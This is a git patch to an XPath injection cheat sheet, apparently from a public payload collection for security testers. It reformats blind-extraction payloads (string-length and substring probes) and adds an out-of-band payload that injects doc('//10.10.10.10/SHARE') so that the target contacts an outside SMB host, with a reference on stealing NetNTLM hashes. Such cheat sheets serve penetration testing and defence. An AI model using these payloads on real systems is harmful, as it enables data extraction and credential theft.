From 88f020381ddcefc96a3fb9125fa398b6f74ba76a Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 22 Oct 2019 23:06:35 +0200
Subject: [PATCH] Out of band XPATH

---
 XPATH Injection/README.md | 27 +++++++++++++++++++++------
 1 file changed, 21 insertions(+), 6 deletions(-)

diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md
index 4b2eddc..12bb05e 100644
--- a/XPATH Injection/README.md	
+++ b/XPATH Injection/README.md	
@@ -1,6 +1,13 @@
 # XPATH injection
 
-XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
+> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
+
+## Summary
+
+* [Exploitation](#exploitation)
+* [Blind exploitation](#blind-exploitation)
+* [Out Of Band Exploitation](#out-of-band-exploitation)
+* [References](#references)
 
 ## Exploitation
 
@@ -24,16 +31,24 @@ x' or name()='username' or 'x'='y
 
 ## Blind Exploitation
 
-```sql
 1. Size of a string
-and string-length(account)=SIZE_INT
-
+    ```sql
+    and string-length(account)=SIZE_INT
+    ```
 2. Extract a character
-substring(//user[userid=5]/username,2,1)=CHAR_HERE
-substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
+    ```sql
+    substring(//user[userid=5]/username,2,1)=CHAR_HERE
+    substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
+    ```
+
+## Out Of Band Exploitation
+
+```powershell
+http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
 ```
 
 ## References
 
 * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
 * [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/)
+* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)